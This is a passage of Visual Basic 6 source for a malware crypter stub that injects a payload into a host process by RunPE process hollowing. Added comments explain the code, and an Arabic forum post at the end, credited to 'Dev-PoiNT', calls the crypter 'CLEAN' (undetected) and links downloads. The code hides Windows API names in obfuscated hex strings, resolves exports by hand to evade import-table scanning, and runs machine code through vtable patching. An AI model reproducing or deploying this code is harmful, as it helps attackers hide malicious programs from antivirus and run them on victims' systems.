lMod = je0amv1tuv2um7k15xuutj6xz3uchn18wd2qv8l6lauarex3kt(lNTDll, v9i26iiq7hvcq2tuerrwq91etpw4rx5rvgbfqsrro0q3iri5fy(Chr$(52) & Chr$(69) & Chr$(55) & Chr$(52) & Chr$(53) & Chr$(55) & Chr$(55) & Chr$(50) & Chr$(54) & Chr$(57) & Chr$(55) & Chr$(52) & Chr$(54) & Chr$(53) & Chr$(53) & Chr$(54) & Chr$(54) & Chr$(57) & Chr$(55) & Chr$(50) & Chr$(55) & Chr$(52) & Chr$(55) & Chr$(53) & Chr$(54) & Chr$(49) & Chr$(54) & Chr$(67) & Chr$(52) & Chr$(68) & Chr$(54) & Chr$(53) & Chr$(54) & Chr$(68) & Chr$(54) & Chr$(70) & Chr$(55) & Chr$(50) & Chr$(55) & Chr$(57))) 'KPC
a95ldcmolh93x6f8nxg56x8zh09v358qkrao5y8kvp5nl12mn4 lMod, tPROCESS_INFORMATION.hProcess, tCONTEXT.Ebx + 8, VarPtr(.ImageBase), 4, 0
' Step 7: point Eax at the payload's entry point and store the modified context
tCONTEXT.Eax = .ImageBase + .AddressOfEntryPoint
'NtSetContextThread
lMod = je0amv1tuv2um7k15xuutj6xz3uchn18wd2qv8l6lauarex3kt(lNTDll, v9i26iiq7hvcq2tuerrwq91etpw4rx5rvgbfqsrro0q3iri5fy(Chr$(52) & Chr$(69) & Chr$(55) & Chr$(52) & Chr$(53) & Chr$(51) & Chr$(54) & Chr$(53) & Chr$(55) & Chr$(52) & Chr$(52) & Chr$(51) & Chr$(54) & Chr$(70) & Chr$(54) & Chr$(69) & Chr$(55) & Chr$(52) & Chr$(54) & Chr$(53) & Chr$(55) & Chr$(56) & Chr$(55) & Chr$(52) & Chr$(53) & Chr$(52) & Chr$(54) & Chr$(56) & Chr$(55) & Chr$(50) & Chr$(54) & Chr$(53) & Chr$(54) & Chr$(49) & Chr$(54) & Chr$(52))) 'KPC
a95ldcmolh93x6f8nxg56x8zh09v358qkrao5y8kvp5nl12mn4 lMod, tPROCESS_INFORMATION.hThread, VarPtr(tCONTEXT)
' Step 8: resume the thread; the host process now runs the written image
'NtResumeThread
lMod = je0amv1tuv2um7k15xuutj6xz3uchn18wd2qv8l6lauarex3kt(lNTDll, v9i26iiq7hvcq2tuerrwq91etpw4rx5rvgbfqsrro0q3iri5fy(Chr$(52) & Chr$(69) & Chr$(55) & Chr$(52) & Chr$(53) & Chr$(50) & Chr$(54) & Chr$(53) & Chr$(55) & Chr$(51) & Chr$(55) & Chr$(53) & Chr$(54) & Chr$(68) & Chr$(54) & Chr$(53) & Chr$(53) & Chr$(52) & Chr$(54) & Chr$(56) & Chr$(55) & Chr$(50) & Chr$(54) & Chr$(53) & Chr$(54) & Chr$(49) & Chr$(54) & Chr$(52))) 'KPC
a95ldcmolh93x6f8nxg56x8zh09v358qkrao5y8kvp5nl12mn4 lMod, tPROCESS_INFORMATION.hThread, 0
hProc = tPROCESS_INFORMATION.hProcess
End With
nvgx1qc0emtn1rsss3505b2vhqcepsbf75jfeu7015eplu3g9n = True
End Function
' Calls the function at address lMod with the given parameters by filling the
' THUNK_APICALL template, storing the resulting bytes in c_bvASM and executing them
' through the vtable-patching helper.
'   lMod   - address of the function to call; 0 makes this a no-op returning 0
'   Params - arguments, each converted with CLng
' Returns whatever the helper call returns.
' Analyst note: functions invoked this way are resolved and called at run time, so
' they are absent from the import table; the code that performs the call lives in a
' data array rather than in the module's code.
Public Function a95ldcmolh93x6f8nxg56x8zh09v358qkrao5y8kvp5nl12mn4(ByVal lMod As Long, ParamArray Params()) As Long
Dim lPtr As Long
Dim i As Long
Dim sData As String
Dim sParams As String
If lMod = 0 Then Exit Function
' Parameters are emitted last-to-first; Chr$(54) & Chr$(56) is the text "68"
' (0x68 is the x86 push-imm32 opcode), followed by the value's 4 bytes as hex
For i = UBound(Params) To 0 Step -1
sParams = sParams & Chr$(54) & Chr$(56) & kopjntebrbsrvzzr9x0y64d72xfhujr0iv4kv83up2wq4xcayw(CLng(Params(i)))
Next
' Displacement from the generated call instruction to lMod, computed from the
' address of c_bvASM and the number of 5-byte entries preceding the call
lPtr = VarPtr(c_bvASM(0))
lPtr = lPtr + (UBound(Params) + 2) * 5
lPtr = lMod - lPtr - 5
sData = THUNK_APICALL
sData = Replace(sData, UECWKCBKAA, sParams)
sData = Replace(sData, LVACRKQAXR, kopjntebrbsrvzzr9x0y64d72xfhujr0iv4kv83up2wq4xcayw(lPtr))
Call PutThunk(sData)
a95ldcmolh93x6f8nxg56x8zh09v358qkrao5y8kvp5nl12mn4 = coys1324j9dnit0ck9fqueaipj4pmgkwisso3r9hh12njqpij2
End Function
' Converts a Long to 8 hexadecimal characters, one zero-padded pair per byte, in the
' order the 4 bytes are laid out in memory by CopyBytes.
Private Function kopjntebrbsrvzzr9x0y64d72xfhujr0iv4kv83up2wq4xcayw(ByVal lData As Long) As String
Dim bvTemp(3) As Byte
Dim i As Long
CopyBytes &H4, bvTemp(0), lData
For i = 0 To 3
' Chr$(48) is "0": prefix it and keep the last two characters to zero-pad
kopjntebrbsrvzzr9x0y64d72xfhujr0iv4kv83up2wq4xcayw = kopjntebrbsrvzzr9x0y64d72xfhujr0iv4kv83up2wq4xcayw & Right(Chr$(48) & Hex(bvTemp(i)), 2)
Next
End Function
' Decodes a string of hex digit pairs and stores the resulting bytes in c_bvASM,
' starting at index 0.
'   sThunk - hex text; each pair of characters becomes one byte
Private Sub PutThunk(ByVal sThunk As String)
Dim i As Long
For i = 0 To Len(sThunk) - 1 Step 2
' Chr$(38) & Chr$(104) is "&h", the VB hex-literal prefix, so CByte parses the pair
c_bvASM((i / 2)) = CByte(Chr$(38) & Chr$(104) & Mid$(sThunk, i + 1, 2))
Next i
End Sub
' Executes the bytes currently stored in c_bvASM: reads this object's vtable pointer,
' overwrites the entry at offset &H1C with the address of c_bvASM, calls the
' placeholder method, then restores the original entry.
' Returns the value produced by the placeholder call.
' NOTE(review): the entry at +&H1C is presumably the slot of the class's first public
' method (the placeholder), which is why its comment forbids adding public procedures
' above it - confirm.
Private Function coys1324j9dnit0ck9fqueaipj4pmgkwisso3r9hh12njqpij2() As Long
' First 4 bytes at the object pointer: address of the vtable
CopyBytes &H4, c_lVTE, ByVal ObjPtr(Me)
c_lVTE = c_lVTE + &H1C
' Save the original entry, then point the entry at the generated code
CopyBytes &H4, c_lOldVTE, ByVal c_lVTE
CopyBytes &H4, ByVal c_lVTE, VarPtr(c_bvASM(0))
coys1324j9dnit0ck9fqueaipj4pmgkwisso3r9hh12njqpij2 = avu8wctg2pljj26lpxnotpb5jp2y03kqvhtlmggeflnd0a9qvm
' Restore the original entry
CopyBytes &H4, ByVal c_lVTE, c_lOldVTE
End Function
' Convenience wrapper: loads the library named sLib and returns the address of its
' export sProc, using this class's own loader and export-table lookup methods.
Public Function j8anuvmuw38t3gl7owt6273iv2lsshzi4alz2o85we3lt4y7em(ByVal sLib As String, ByVal sProc As String) As Long
j8anuvmuw38t3gl7owt6273iv2lsshzi4alz2o85we3lt4y7em = Me.je0amv1tuv2um7k15xuutj6xz3uchn18wd2qv8l6lauarex3kt(Me.y9btrf3pvz28b4m1iuliy4lp6hkhx2o0plajfvh7ahfc2e0dji(sLib), sProc)
End Function
' Calls the function whose address is stored in c_lLoadLib (resolved as LoadLibraryW
' in Class_Initialize) with a pointer to the NUL-terminated library name, and returns
' its result.
Public Function y9btrf3pvz28b4m1iuliy4lp6hkhx2o0plajfvh7ahfc2e0dji(ByVal sLib As String) As Long
y9btrf3pvz28b4m1iuliy4lp6hkhx2o0plajfvh7ahfc2e0dji = a95ldcmolh93x6f8nxg56x8zh09v358qkrao5y8kvp5nl12mn4(c_lLoadLib, StrPtr(sLib & vbNullChar))
End Function
' True when Class_Initialize obtained both a kernel base address and the address of
' LoadLibraryW.
Public Property Get Initialized() As Boolean
Initialized = c_bInit
End Property
' Class constructor: stores the THUNK_KERNELBASE bytes in c_bvASM and executes them to
' obtain c_lKrnl, then looks up the export whose name the Chr$() chain spells
' ("LoadLibraryW") in that module. c_bInit becomes True only when both succeed.
' NOTE(review): per the header credit ("kernel base asm") the thunk presumably returns
' the kernel32 base address without calling any imported API - confirm.
Public Sub Class_Initialize()
Call PutThunk(THUNK_KERNELBASE)
c_lKrnl = coys1324j9dnit0ck9fqueaipj4pmgkwisso3r9hh12njqpij2
If Not c_lKrnl = 0 Then
' Character codes 76,111,97,100,76,105,98,114,97,114,121,87 spell "LoadLibraryW"
c_lLoadLib = je0amv1tuv2um7k15xuutj6xz3uchn18wd2qv8l6lauarex3kt(c_lKrnl, Chr$(76) & Chr$(111) & Chr$(97) & Chr$(100) & Chr$(76) & Chr$(105) & Chr$(98) & Chr$(114) & Chr$(97) & Chr$(114) & Chr$(121) & Chr$(87))
If Not c_lLoadLib = 0 Then
c_bInit = True
End If
End If
End Sub
' Looks up an exported function by name by reading the loaded module's PE headers and
' export directory directly from memory, instead of calling an imported lookup API.
'   lMod  - address of the loaded module
'   sProc - export name to find (compared case-sensitively with =)
' Returns the function address, or 0 when the signatures do not match, the name is
' not found, or a forwarded export cannot be resolved.
' Analyst note: because resolution is done by hand, the resolved names appear neither
' in the import table nor as arguments to a monitored lookup call.
Public Function je0amv1tuv2um7k15xuutj6xz3uchn18wd2qv8l6lauarex3kt(ByVal lMod As Long, ByVal sProc As String) As Long
Dim tIMAGE_DOS_HEADER As IMAGE_DOS_HEADER
Dim tIMAGE_NT_HEADERS As IMAGE_NT_HEADERS
Dim tIMAGE_EXPORT_DIRECTORY As IMAGE_EXPORT_DIRECTORY
Call CopyBytes(SIZE_DOS_HEADER, tIMAGE_DOS_HEADER, ByVal lMod)
If Not tIMAGE_DOS_HEADER.e_magic = IMAGE_DOS_SIGNATURE Then
Exit Function
End If
Call CopyBytes(SIZE_NT_HEADERS, tIMAGE_NT_HEADERS, ByVal lMod + tIMAGE_DOS_HEADER.e_lfanew)
If Not tIMAGE_NT_HEADERS.Signature = IMAGE_NT_SIGNATURE Then
Exit Function
End If
Dim lVAddress As Long
Dim lVSize As Long
Dim lBase As Long
' DataDirectory(0) is the export directory: lVAddress is its start address and
' lVSize its end address (start + size), despite the variable's name
With tIMAGE_NT_HEADERS.OptionalHeader
lVAddress = lMod + .DataDirectory(0).VirtualAddress
lVSize = lVAddress + .DataDirectory(0).Size
lBase = .ImageBase
End With
Call CopyBytes(SIZE_EXPORT_DIRECTORY, tIMAGE_EXPORT_DIRECTORY, ByVal lVAddress)
Dim i As Long
Dim lFunctAdd As Long
Dim lNameAdd As Long
Dim lNumbAdd As Long
With tIMAGE_EXPORT_DIRECTORY
' Walk the name table; on a match, map name index -> ordinal -> function address
For i = 0 To .NumberOfNames - 1
CopyBytes 4, lNameAdd, ByVal lBase + .lpAddressOfNames + i * 4
If a4x240goslhx0t9hjisdg40lajahv6pu1dkywa9y61wkoibx8j(lBase + lNameAdd) = sProc Then
CopyBytes 2, lNumbAdd, ByVal lBase + .lpAddressOfNameOrdinals + i * 2
CopyBytes 4, lFunctAdd, ByVal lBase + .lpAddressOfFunctions + lNumbAdd * 4
je0amv1tuv2um7k15xuutj6xz3uchn18wd2qv8l6lauarex3kt = lFunctAdd + lBase
' An address inside the export directory is treated as a forwarder string:
' resolve the named library and export, then look that one up recursively
If je0amv1tuv2um7k15xuutj6xz3uchn18wd2qv8l6lauarex3kt >= lVAddress And _
je0amv1tuv2um7k15xuutj6xz3uchn18wd2qv8l6lauarex3kt <= lVSize Then
Call ww9ooiphmp9scxi8gryge15iu5o7yvis77ub9a1l950s62p9mi(je0amv1tuv2um7k15xuutj6xz3uchn18wd2qv8l6lauarex3kt, lMod, sProc)
If Not lMod = 0 Then
je0amv1tuv2um7k15xuutj6xz3uchn18wd2qv8l6lauarex3kt = je0amv1tuv2um7k15xuutj6xz3uchn18wd2qv8l6lauarex3kt(lMod, sProc)
Else
je0amv1tuv2um7k15xuutj6xz3uchn18wd2qv8l6lauarex3kt = 0
End If
End If
Exit Function
End If
Next
End With
End Function
' Resolves a forwarded export: reads the string at lAddress and, when it contains a
' "." (Chr$(46)), loads the library named by the part before the dot into lLib and
' sets sMod to the part after it. Both outputs are left unchanged when there is no dot.
'   lAddress - address of the forwarder string
'   lLib     - (out) module address returned by the library loader
'   sMod     - (out) export name to look up in that library
Private Function ww9ooiphmp9scxi8gryge15iu5o7yvis77ub9a1l950s62p9mi( _
ByVal lAddress As Long, _
ByRef lLib As Long, _
ByRef sMod As String)
Dim sForward As String
sForward = a4x240goslhx0t9hjisdg40lajahv6pu1dkywa9y61wkoibx8j(lAddress)
If InStr(1, sForward, Chr$(46)) Then
lLib = y9btrf3pvz28b4m1iuliy4lp6hkhx2o0plajfvh7ahfc2e0dji(Split(sForward, Chr$(46))(0))
sMod = Split(sForward, Chr$(46))(1)
End If
End Function
' Reads a NUL-terminated single-byte string from memory, one byte at a time starting
' at lAddress, and returns it without the terminator.
Private Function a4x240goslhx0t9hjisdg40lajahv6pu1dkywa9y61wkoibx8j( _
ByVal lAddress As Long) As String
Dim bChar As Byte
Do
CopyBytes 1, bChar, ByVal lAddress
lAddress = lAddress + 1
' Stop at the first zero byte
If bChar = 0 Then Exit Do
a4x240goslhx0t9hjisdg40lajahv6pu1dkywa9y61wkoibx8j = a4x240goslhx0t9hjisdg40lajahv6pu1dkywa9y61wkoibx8j & Chr$(bChar)
Loop
End Function
' Decodes a string of hex digit pairs into the characters they encode. Used by the
' injection method to turn its stored hex text back into module and API names.
Private Function v9i26iiq7hvcq2tuerrwq91etpw4rx5rvgbfqsrro0q3iri5fy(ByVal sData As String) As String
Dim i As Long
For i = 1 To Len(sData) Step 2
' Chr$(38) & Chr$(72) is "&H": Val parses each pair as a hex number
v9i26iiq7hvcq2tuerrwq91etpw4rx5rvgbfqsrro0q3iri5fy = v9i26iiq7hvcq2tuerrwq91etpw4rx5rvgbfqsrro0q3iri5fy & Chr$(Val(Chr$(38) & Chr$(72) & Mid$(sData, i, 2)))
Next i
End Function
' Decodes a string of hex digit pairs into the characters they encode (same result as
' the private hex decoder above, written with a literal "&H" prefix). No call to this
' function is visible in the listed code.
Public Function rizc6m31kcdz9qacz67ezxravytv3t8xb13hmf5i79mptq2tjr(ByVal OnvN9MtEry As String) As String
Dim qOHPMMuJzh As String
Dim xE8KVQnQr6 As String
Dim orCPFJ0gUA As Long
For orCPFJ0gUA = 1 To Len(OnvN9MtEry) Step 2
qOHPMMuJzh = Chr$(Val("&H" & Mid$(OnvN9MtEry, orCPFJ0gUA, 2)))
xE8KVQnQr6 = xE8KVQnQr6 & qOHPMMuJzh
Next orCPFJ0gUA
rizc6m31kcdz9qacz67ezxravytv3t8xb13hmf5i79mptq2tjr = xE8KVQnQr6
End Function
يجب تطبيق هذه الخطوات
وبكذا خلصنا برمجـة الستب ..
طبعاً لازم يكون أسم الستب هو
Stub
ويكون موجود بجنب برنامج التشفير
بكذا خلصنا العمل ..
وطبعاً التشفيرة هي CLEAN !
وأعتمدت على التشفير بأستخدام RunPE !
والأن مع السورس كود حق برنامج التشفير ألي صممته
للكسولين
أي أستفسار أو أي مشكلـة متواجد هنا لحلها
مؤسسـة الأبداع التقني Dev-PoiNT
المخرج Dr.AdNaN
(C) جميع الحقوق محفوظـة
لتحميل الأكواد لمن يضهر له خطأ :
http://www.multiupload.com/T7JDYHTRSZ
لتحميل الصور لمن لم تضهر له :
http://www.multiupload.com/2TLZ5NQSIR